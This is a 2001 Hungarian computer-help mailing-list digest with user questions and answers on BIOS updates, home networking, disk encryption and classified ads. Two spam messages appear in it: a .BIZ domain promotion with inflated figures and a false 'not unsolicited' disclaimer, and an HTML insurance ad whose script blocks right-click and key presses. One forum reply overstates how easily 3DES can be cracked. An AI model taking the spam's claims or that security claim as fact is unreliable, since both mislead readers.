>   tudja csak a hasznalt szektorokat kimenteni, szoval ne olyan legyen
>   mint a Nero progija, ami mellesleg ettol eltekintve nagyon jo

Norton Ghost.

Minden jot, Vili   www.macasoft.hu  HIXEditor 1.15beta7
Kuldes: GURU/Maganba
+ - bios frissitese (mind) VÁLASZ  Feladó: (cikkei)

Emberek!

AMI Bios. Frissiteni akarom. Mar tobb aminf...exe-t is kiprobaltam,
mindegyikre ugyanaz a hiba jon elo. A .rom file az alaplaphoz valo,
ez biztos. Abbol is probaltam tobb verziot is.
Szepen felismer mindent az iro prg., aztan amikor tenylegesen irnia
kellene, hibauzenet:
Error 20 . Flash ROM cannot be correctly programmed.
Disable USB ...

Az USB letiltva. Megis mi lehet a hiba?
Koszi,
cszs
+ - Power, Sleep, Week UP (mind) VÁLASZ  Feladó: (cikkei)

Udv Guruk!

A kovetkezo a porblemam:

Szeretnem Win98SE alatt megovni gepemet a 'veletlen'
billentyuleutesektol (pl. otthagyok hosszabb letolteseket).
Ezert a ScreenSaver-nel jelszot allitottam be. Sajnos ez
nem ved meg a Power, Sleep, Week Up billentyuk
leutesetol. Tud valaki erre megoldast?
Lehetoleg olyat, amelyiknel megmaradnak a
'Turn off Monitor...', 'Turn off hard disk...' funkciok.
A 'huzd ki a billentyuzetet' tipusu megoldastol kimeljetek!

Segitsegeteket elore is koszonom!

Fancso
+ - Re: =?UNKNOWN?Q?K=E9t_g=E9p_=F6sszek=F6t=E9se?= (mind) VÁLASZ  Feladó: (cikkei)

>  A felesigemnek szeretnik vasarolni egy gipet, is szeretnink a kit gipet
>vsszekvtni halszati kartya segmtsigivel. Az in gipemben van egy
halskartya,
>amelybe a kabelmodem van bekvtve.
>  Kirdisem, hogy megoldhats-e, is ha igen, akkor hogyan, hogy mindkit
gippel
>egyszerre tudjunk netezni a UPC chellot hasznalva.
> Milyen halskartyat kell vennem a masik gipbe, kell-e valami plusz
szoftwer,
>stb.
>Sajnos ebben a timaban teljesen jaratlan vagyok, kirem, aki tud segmtsen!

A te gepedbe is kell meg egy halokartya, mert az lesz osszekotve a
feleseged gepeben levovel. Mivel nem lesz (gondolom) nagy tavolsag a ket
gep kozott es tulzott forgalom sem, egy egyszeru 3-4 ezer forintos Realtek
chip-es UTP-s kartya megteszi. A ket gepet pedig egy crosslink UTP kabellal
tudod osszekotni. Ha az oprendszered win98 SE, vagy ennel ujabb (win2k,
winME, winXP), akkor a chellos halokartya belallitasainal kipipalod az
internetmegosztast, a feleseged halokartyajan pedig a DHCP-t (azaz az
automatikus IP-cimet).

mikellos

Ui: bocs, inkabb ne hasznalj ekezetet, csak ha tudod, a cimzett biztos jol
kapja meg. Listakra egyaltalan ne hasznalj, mert sokan sokfelekepp kapjak
meg. Olvasd el az idzetet a te leveledbol es latod, mirol beszelek.

HIXEditor 1.15beta6
+ - important update (mind) VÁLASZ  Feladó: (cikkei)

Status Alert: .BIZ is NOW LIVE

The new .BIZ domain extension was officially launched today, and new registrati
ons are already on a record-setting pace.  Several sites have just made .BIZ av
ailable to the general public which means that ordinary internet users can regi
ster this exciting new domain without the cumbersome paperwork.  One such popul
ar site is: http://www.InfoGrab.com

Brief History
Back in November, 2000,  ICANN, the regulatory agency which oversees the Intern
et's Domain Name System, approved seven new domain extensions to meet growing d
emand from the consumer and business sectors.  Since the new extensions were fi
rst announced last year, experts have widely expected .BIZ to become the most p
opular of the new extensions and to eventually supercede .COM. The .BIZ registr
y will be managed by upstart NeuLevel, in direct competition with the former mo
nopoly of Network Solutions. .BIZ represents the first new generic domain name 
to be introduced since .COM was first launched in 1984. In the ten year span be
tween 1984 and 1994, less than one million .COM domains were registered in tota
l. Today, the registration total for .BIZ will have already exceeded one millio
n. How times have changed...

The Benefits:
..BIZ aims to be the quintessential domain choice for all businesses on the Int
ernet.  Short for .BUSINESS, the .BIZ domain directly addresses the growing nee
d for new generic domain names to eventually replace .COM as the Internet most 
widely used domain name. The benefits to go .BIZ are clear:
* abundant availability of easy to remember and practical domain names
* technically recognized across the Internet's DNS
* short and catchy extension
* affordable registration fees and simplified registration procedures


"Establishing a .biz domain name also will help companies cut through the .com 
clutter. More than 28 million .com names have already been registered. Since th
e .com domain covers so many sites serving so many different purposes, it's imp
ossible to know whether a particular .com address represents a bona-fide busine
ss. In contrast, .biz means business, period."
Chicago Tribune, August 22, 2001

To register a new .BIZ extension, you will simply need to check the availabilit
y of your domain name at: http://www.InfoGrab.com and then register it using th
e easy 3 step process which takes less than 5 minutes.

***************************************************************************
This firm opposes the continued sending of unsolicited email and does not inten
d to send email to anyone who does not wish to receive their special mailings. 
As a result, they have retained the services of Auto Email Removal, an independ
ent 3rd party, to administer their list management and removal services (http:/
). This is not un
solicited email. If you do not wish to receive further mailings, please click t
his link and your removal request will be honored. The removal administrator ca
n then preclude your email address from future mailings. http://www.autoemailre
 Auto Email Removal Company. Ref#
 011105
***************************************************************************
+ - TV-Out kezelo progi kellene (mind) VÁLASZ  Feladó: (cikkei)

Sziasztok!

Olyan programot keresnék, ami a videókártyák
(konkrétan GeForce2 MX400-as) TV kimenetét
lehet konfigurálni, átállítgatni! A TV Tool és a TV
Control Center 2000 programokon kívül, mert ezeket
ismerem! Ha esetleg valakinek megvan a TV Tool
valamelyik TELJES verziója, az írjon MAGÁNBA!
Köszönöm!

Üdv!

Csokis
E-mail: 
E-mail:  (Nagyobb küldemény esetén!)
Tel./Fax: (06-37)/500-345
--- Kanalas Ernőt Villájában Megkéselték ---
+ - [WINDOWS] Re: vinyon levo adatok titkositasa (mind) VÁLASZ  Feladó: (cikkei)

>Tehat a lenyeg hogy mar a bootolas elott kerje a jelszot es
>masik vinyorol bebootolva se lassanak rajta ertelmezheto adatokat.
>A WinXP-n is van titkositas tudtommal ha NTFS-re teszed fel ezt hasznalja
>valaki?

Az 2k/XP féle des EFS (encryptedfilesystem) csak 3DES erossegu (3x56bit) amit m
anapság célgépekkel 1nap alatt fel lehet torni (nem pc-vel..) és muszáj smartca
rd-ot használni, mert ha nem akkor fizikailag hozzáférve a géphez a kulcsaidat 
látva még ennyi ido se kell egy hozzáértonek...
Tehát haverok, vállalaton belul jo, de nem kormányzati erossegu ellenfel ellen 
hatasos. 

Van még a PGPdisk ami fizetos kategoria, és jo hosszu jelszot megadva (amit ind
uláskor mindig megadsz neki) már katonai erosségu titkositast ad.
Ajánlom még a E4M-t (www.e4m.net) ami free progi, szintén eros titkositással.
Sajna ezen progik csak a win betoltodése után használhatok, ezért az 1. feltéte
ledet nem teljesitik...

Sok sikert..
Doky

(webes bekuldes, a bekuldo gepe: nautilus.dialup.westel900.net)
+ - [DOS] Re: vinyon levo adatok titkositasa (mind) VÁLASZ  Feladó: (cikkei)

>Tehat a lenyeg hogy mar a bootolas elott kerje a jelszot 

Bocsi mégegy eszembejutott:
A SAC-on (http://sac-ftp.externet.hu/) nézz korul a fdp108 progi után. Ez pont 
azt csinálja amit kérsz. Az MBR betoltodésekor kér egy jelszot. Én régen haszná
ltam dos alatt, de elmegy w9x-el is (NT-és más nem-dos alphoz már nem jo). Sajn
a Pentiumos gépen nem indul el, de erre lehet hogy van valami megoldás régebbro
l: pascal/pentium pach?
Doky

(webes bekuldes, a bekuldo gepe: nautilus.dialup.westel900.net)
+ - [TELEFON] re: Gepvasarlas (mind) VÁLASZ  Feladó: (cikkei)

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>Felado :  [Hungary]
>Temakor: [TELEFON] Gepvasarlas ( 21 sor )
>Idopont: Mon Nov 26 14:03:20 CET 2001 GURU #2481

>Egy ismerosom szeretne PC-t venni, az elkepzelesei megvannak

>Amire hasznalni akarja: foleg Photoshop, MS Office, CD iras,
>neha regebbi 3D-s jatekok (pl. Half-Life).

>Igenyei: upgrade-elhetoseg a proci teren, tulhajthatosag,

Itt aljunk meg! A fenti programok (a jatekokat leszamitva),
es a tulhajthatosag valahogy nem illik ossze. Bar ha ismerosod
mazochista, es szereti atelni az erzest, amikor a CD iras
75%-nal purcan ki a rencer, vagy a tobb oran at szerkesztett
kepnal hal keket a szamitogep, akkor, usse ko!

>stabilitas (az utobbi a fontosabb), 17" monitor. Hangkartya

Na tessek, mondom en, hogy nem kell tulhajtani!

>atlagos, modem nem kell, vinyo ~ 30GB, a tobbi a szokasos.
>200 nettoig tud elmenni (AFA-t visszakapja).
Ebbol jo kis gepet ossze lehet hozni, sztem menjen be
nehany boltba, kerdezze meg, mit adnak ezert, es a 
tapasztalatokat osszatok meg a listaval. Mi megmondunk
mindent, amit tudunk roluk. Ha elkezdunk itt hardverrol
meselni, arrol konnyen kiderulhet, hogy egy baj van veluk:
"nem kapni a mi uccankban..."
--
Török István
* Mailto:
+ - re: *.bin (mind) VÁLASZ  Feladó: (cikkei)

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>Felado :  [International]
>Temakor: *.bin ( 9 sor )
>Idopont: Sun Nov 25 17:10:58 CET 2001 GURU #2480

>Tudja-e valaki milyen filet takarhat a *.bin kiterjesztes? A filemerete =
>kb. 1 CD -nyi es ezt melekelik hozza: FILE "DVNDRCOP.BIN" BINARY, TRACK =01
>MODE2/2352, INDEX 01 00:00:00. Mivel lehet ezt megnyitni?
>
>legyetek szivesek maganba is )

A BIN egy binaris adatfolyamra utal. Ez barmi lehet, illetve nem
akarmi, hanem csak olyasmi, amit szamitogen adat formaban 
abrazolni/felirni/tarolni lehet. Azaz: program, kep, hang,
szoveg, adatbazis, stb. Amit te lattal, az vszleg egy CD-DA
tukrozott masolata.
--
Török István
* Mailto:
+ - [WINDOWS] re: Re: XP es a driverei? (mind) VÁLASZ  Feladó: (cikkei)

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>Felado :  [Hungary]
>Temakor: [WINDOWS] Re:  XP es a driverei? ( 20 sor )
>Idopont: Sun Nov 25 18:03:29 CET 2001 GURU #2480

>>Volt 486-os gepem is, amire WIN95 volt felteve, de tuladtam rajta.
>>Most egy 386 SX 25 Mhz gep van otthon. Tokeletesen elegendo,
>Nem tudom, milyen programot hasznalsz - DOS/Linux alatt meg hagyjan, de
>barmilyen "W"-s rendszerhez mar keves. Szerintem azert kene lecserelned,

Hat Mario, Pinball, DYNA meg  mittom en mi a 150 kis jatek
kozul... A masodikos keresztlanyom meg sosem panaszkodott
hogy keves lenne...

>mert ma mar nehol ingyen hozzadvagnak egy 386DX alaplapot (ha veszel egy
>egeret), ill. ha pl. monitort veszel, akkor teljes 486-os gepet. Azert
>van meg 386-os gepem, mert a dobozba nem fer be a plusz hutes.
>Egyebkent ezek az eszkozok lassan kezdenek tonkremenni - nekem a
>napokban lett teljesen bizonytalan egy 8 eves I/O kartya es 
>egy 5 1/2 floppy drive.
>Mostanaban mar nem sok helyen javitjak...

Nem hat, de egy sereg helyen lehet kapni.... Ha kell kuldok
neked 5,25 "-os drive-t, szinte uj allapotban, ha gondolod,
tobbet is osszeszedek, megegyezhetunk. I/O kartya hany kell?
--
Török István
* Mailto:
+ - CD printer (mind) VÁLASZ  Feladó: (cikkei)

Hali!

Keresnek olyan embert aki vallana Sopron kornyeken ~70 db CD feluletenek
nyomtatasat. Nincs sok macera, mert mindegyikre ugyanaz kell. Ha
vallalnad legyszives arat is irj. Etikettnyomtatasos modszer szoba sem
johet. Mindenkeppen a CD feluletere kellene nyomtatni.

--
Udv:
       Stanicz Feri
       
       www.nemethvill.hu/stanicz/
2001.11.28 13:36:34  --HE 1.15beta7
+ - Re: pdf to doc (mind) VÁLASZ  Feladó: (cikkei)

Szia Gergo,

A GURU 2480-ban irta :
>Keresnek olyan programot, ami kepes a PDF-et docba konvertalni. Bar
>ott van az Adobe Reader (az otos verziot probaltam), tudom, de az nem
igazan mu
>kodik jol, olyan

Nezz korul az adobe.lap.hu oldalon az Acrobat plug-ineknel. A Drake es
Iceni termekeit nezd meg. Mindketto viszonylag jol konvertal, demot lehet
letolteni az oldalukrol. Arra jo, hogy leteszteld, hogy jol kezelik-e a
kethasabos szoveget. 

--
Udv, Zsuzsi    ICQ# 127560224     http://adobe.lap.hu
http://letoltes.lap.hu            http://internetbiztonsag.lap.hu
http://pda.lap.hu                 http://csevegoprogram.lap.hu
+ - Double Your Life Policy No Xtra Cost 3046 (mind) VÁLASZ  Feladó: (cikkei)

<HTML>
<BODY>
<script language=3D"JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init=3D=3Dtrue) with (navigator) {if ((appName=3D=3D"Netscape")&&(pa=
rseInt(appVersion)=3D=3D4)) {
    document.MM_pgW=3DinnerWidth; document.MM_pgH=3DinnerHeight; onresize=3D=
MM_reloadPage; }}
  else if (innerWidth!=3Ddocument.MM_pgW || innerHeight!=3Ddocument.MM_pgH=
) location.reload();
}
MM_reloadPage(true);
// -->
</script>
</head>

<body>

<table border=3D"1" width=3D"68%" bordercolor=3D"#008000" bordercolorlight=
=3D"#000080"
bordercolordark=3D"#0000FF">
  <tr>
    <td width=3D"100%"><p align=3D"center"><font face=3D"Arial Black" colo=
r=3D"#0000FF" size=3D"5">Do
      You Have Enough Life Insurance?</font></p>
      <p align=3D"center"><font face=3D"Arial Black" color=3D"#FF0000"><bi=
g><big><big>Save
      70% Off Your Life Insurance</big></big></big></font></p>
    <p align=3D"center"><font face=3D"Arial Black" color=3D"#008040"><img
    src=3D"http://66.163.40.11/insur-a/1-log.jpg" width=3D"180" height=3D"=
160"
    alt=3D"1-log.jpg"></font>
    <font face=3D"Arial" color=3D"#000080">
    <br>
    </font>
    <font face=3D"Arial">Double Your Life Insurance At </font><b><font fac=
e=3D"Arial" color=3D"#FF0000" size=3D"5">NO
    EXTRA COST </font></b>
    <p align=3D"center"><b><font face=3D"Arial" size=3D"5">$250,000 policy=
</font><font face=3D"Arial" size=3D"3"> </font></b>
    <p align=3D"center"><b><font face=3D"Arial" size=3D"5">for $6.50 per m=
onth</font></b>
    <p align=3D"center"><font face=3D"Arial" color=3D"#000080">
    <strong><a href=3D"http://66.163.40.11/life/" target=3D"_blank">CLICK =
HERE FOR MORE INFO</a>
    </strong></font>
    <p align=3D"center"> </td>
  </tr>
</table>
<script language=3D"JavaScript">
//this code is the beginning of the right click and key disable
function right(e) { 
if (navigator.appName =3D=3D 'Netscape' && 
(e.which =3D=3D 3 || e.which =3D=3D 2)) 
return false; 
else if (navigator.appName =3D=3D 'Microsoft Internet Explorer' && 
(event.button =3D=3D 2 || event.button =3D=3D 3)) { 
alert("This Action Not Allowed!"); 
return false; 
} 
return true; 
} 

function keypressed() { 
alert("This Action Not Allowed!"); 
} 
document.onmousedown=3Dright; 
document.onkeydown=3Dkeypressed; 
</script>


<p> </p>
</body>
</html>






























<p><p><p><p><p><p><p><p><p><p>





<html><p><p><head><p><title>COPY ANY DVD MOVIE</title><p><p><p><p><p><p><p=
><p><p>
</BODY>
</HTML>
+ - [DOS] AC 97 DOS-ban (mind) VÁLASZ  Feladó: (cikkei)

Hali!
Akik kertek, megkaptak az Ac97-es
DOS proggyt.
Kozben meglett az URL is:
http://schneegans.de/tips/dos-soundtreiber.html

Itt lehet kutakodni
+ - Re: Re[2]: enternet adsl (mind) VÁLASZ  Feladó: (cikkei)

> Ujabb szolgaltato lepett ringbe az ugyfelekert, az Interware.
>
> Privat ADSL:  Egy eves szerzodes eseten nincs kiepitesi dij, a  havi dij
> 6.600 Ft + AFA. Az elso honapot megrendeleskor elore ki kell fizetni. Ami
> jar hozza:  5 db e-mail cim, korlatlan e-mail tarterulet, 100 MB
webtarhely

Most neztem itt nalunk Godollo-n a V-Net oldalan az ADSL akciot: nincs
belepesi dij, es 2 evig 12500 FT. Multkor meg 15000 -re tartottak. Hat
azthiszem meg varok, addig is valahogy kibirom ezzel a "kivalo" modemes
eleressel. Mennek ezek meg lejjebb is... :)
+ - Re: Pmail forwarding (mind) VÁLASZ  Feladó: (cikkei)

Hello Janos!

Kiprobaltam egy ket modszert, nekem vegulis ket fele modon 
sikerult.
Mind a ketszer ugy, hogy nem nyitottam meg a levelet, hanem 
csak kijeloltem, es forward-ot nyomtam. A megjeleno menuben 
ketfelet lehet valasztani. A simple forward, akkor nem tudsz 
hozzairni a levelhez (ha megprobalod, akkor bemasolja a level 
testebe a forward-olando level mime kodjat, ami pedig nem tul 
celszeru), hanem csak tovabbkuldi a levelet. Viszont ebben az 
esetben megmarad az eredeti felado.(ez logikus)
Ha hozza akarsz irni a levelhez, akkor azt ugy lehet, hogy forward-
ando levelet attachment-kent kell kuldeni (forward menu masik 
opcioja). 

Almos


Sza'ntai Ja'nos a ecrit:

> =======================================================
> Felado :  [Hungary]
> Temakor: Pmail forwarding ( 9 sor )
> Idopont: Sun Nov 25 18:05:54 CET 2001 GURU #2480
> - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> 
> Sziasztok!
> 
> Hogyan lehet Pmailben attachmenttel egyutt forwardolni egy
> levelet? De szep magyar mondat:)))))))))
> Maganba is please, mert nem mindig olvasok GURU-t:(((
>  Sza'ntai Ja'nos Budapest/Hungary   nick: 
>     mailto:  ICQ UIN: 5529522
> ---
>   http://www.chameleon.ini.hu http://szantai.net
---
       Eurinsa, INSA de Lyon
                   icq# : 94439104
+ - [HIRDETES] UD polo (mind) VÁLASZ  Feladó: (cikkei)

Sziasztok!

Volt egy UD polo project, ebbol maradt nehany darab. Ha kell
valakinek, akkor irjon. Darabja 1800 Ft+postakoltseg. A polo
megtekintheto a http://ud.fw.hu cimen.
-- 
koka. icq#98705990 
Netszemle http://lista.prim.hu/levlista.prm?mit=csatlakozni&lista_id=66
+ - [HIRDETES] elado Lexmark Z12-es szines nyomtato (mind) VÁLASZ  Feladó: (cikkei)

patron nelkul, mert kifogyott 
 8.000 Ft-ert.

Maganba kuldj valaszt, ha erdekel.
Udv
Gab

AGYKONTROLL ALLAT AUTO AZSIA BUDAPEST CODER DOSZ FELVIDEK FILM FILOZOFIA FORUM GURU HANG HIPHOP HIRDETES HIRMONDO HIXDVD HUDOM HUNGARY JATEK KEP KONYHA KONYV KORNYESZ KUKKER KULTURA LINUX MAGELLAN MAHAL MOBIL MOKA MOZAIK NARANCS NARANCS1 NY NYELV OTTHON OTTHONKA PARA RANDI REJTVENY SCM SPORT SZABAD SZALON TANC TIPP TUDOMANY UK UTAZAS UTLEVEL VITA WEBMESTER WINDOWS